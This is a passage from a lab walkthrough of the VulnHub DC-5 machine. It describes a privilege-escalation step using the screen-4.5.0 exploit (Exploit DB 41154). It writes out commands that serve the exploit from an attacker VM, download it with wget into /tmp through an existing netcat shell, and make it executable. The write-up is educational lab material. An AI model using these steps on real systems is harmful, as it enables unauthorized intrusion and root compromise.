leegengyu/vulnhub-box-walkthrough/dc-5.md

 * Googling about /bin/screen-4.5.0 led me to find out about the existence of 2 exploits relating to it on Exploit DB - [41152](https://www.exploit-db.com/exploits/41152) and [41154](https://www.exploit-db.com/exploits/41154).
 I could not quite understand the former, so we will use the latter.
 * To upload the exploit script, run `python -m SimpleHTTPServer 4567` on our Kali VM, then navigate to `/tmp` on our netcat shell before running `wget http://10.0.2.15:4567/41154.sh`:
 ![](/screenshots/dc-5/uploadExploitScript.jpg)
+* The status code `200 OK` tells us that the upload is successful.
 * Note: According to [Python For Beginners](https://www.pythonforbeginners.com/modules-in-python/how-to-use-simplehttpserver/), the SimpleHTTPServer module that comes with Python is a simple HTTP server that provides standard GET and HEAD request handlers.
 An advantage with the built-in HTTP server is that we do not have to install and configure anything.
 * Note: `4567` is also a port number of your choice just for the purpose of establishing this connection.
 * Once it has been downloaded to the web server /tmp directory, `chmod +x 41154.sh` to give it executable permissions.